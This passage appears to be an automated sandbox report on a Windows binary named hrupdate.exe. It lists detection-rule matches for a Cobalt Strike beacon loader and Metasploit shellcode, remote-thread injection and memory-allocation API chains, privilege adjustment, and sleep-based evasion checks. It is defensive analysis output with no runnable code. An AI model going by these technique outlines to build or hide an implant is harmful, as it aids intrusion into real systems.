Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A2E65 CreateThread,CreateRemoteThread,GetCurrentProcess,NtCreateThreadEx,CreateThread,CreateRemoteThread,0_2_046A2E65
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A2824 VirtualAlloc,VirtualAllocEx,GetCurrentProcess,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,0_2_046A2824
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A29D5 VirtualProtect,VirtualProtectEx,GetCurrentProcess,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,0_2_046A29D5
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04698D88 GetLastError,CreateProcessWithLogonW,GetLastError,_memset,GetLastError,0_2_04698D88
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BD4E00_2_046BD4E0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B15A60_2_046B15A6
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BA9E80_2_046BA9E8
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046ABBDA0_2_046ABBDA
Source: hrupdate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: dump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: classification engineClassification label: mal96.troj.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046987F5 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_046987F5
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469B1AE CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32First,Thread32Next,Sleep,0_2_0469B1AE
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SibcorUpdate0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SibcorUpdate0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: ,Dg0_2_00671480
Source: hrupdate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\hrupdate.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncryptsslp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BFCF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_046BFCF7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F334F0 push cs; iretd 0_3_00F334F4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F338EC push cs; iretd 0_3_00F3392C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34AD6 push edi; retf 0_3_00F34AE4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F306D4 push cs; iretd 0_3_00F306E0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32AC5 push cs; iretd 0_3_00F32B0C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F342CB push cs; iretd 0_3_00F342CC
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34AB8 push cs; iretd 0_3_00F34AC4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F338AF push cs; iretd 0_3_00F338B0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32497 push cs; iretd 0_3_00F32498
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F31683 push cs; iretd 0_3_00F31684
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32077 push cs; iretd 0_3_00F32078
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33A75 push cs; iretd 0_3_00F33A7C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32053 push cs; iretd 0_3_00F32054
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3123C push cs; iretd 0_3_00F312AC
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33422 push cs; iretd 0_3_00F33428
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32816 push ds; iretd 0_3_00F3281C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3161B push cs; iretd 0_3_00F3161C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3241F push cs; iretd 0_3_00F32438
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34403 push cs; iretd 0_3_00F34404
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F307F3 push cs; iretd 0_3_00F307F4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F301F9 push ebp; ret 0_3_00F301FA
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F343DF push cs; iretd 0_3_00F343E4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F31DBE push cs; iretd 0_3_00F31DC8
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34F77 push cs; iretd 0_3_00F34F78
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F35143 push cs; iretd 0_3_00F35144
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33B29 push cs; iretd 0_3_00F33B30
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F30710 push cs; iretd 0_3_00F30714
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_006738D6 push ecx; ret 0_2_006738E9
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046AE7C0 push eax; ret 0_2_046AE7C7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B1BB1 push ecx; ret 0_2_046B1BC4
Source: C:\Users\user\Desktop\hrupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04697BE70_2_04697BE7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469CBF10_2_0469CBF1
Source: C:\Users\user\Desktop\hrupdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-19976
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-17900
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-17893
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-18159
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469CBF10_2_0469CBF1
Source: C:\Users\user\Desktop\hrupdate.exe TID: 1076Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469F544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_0469F544
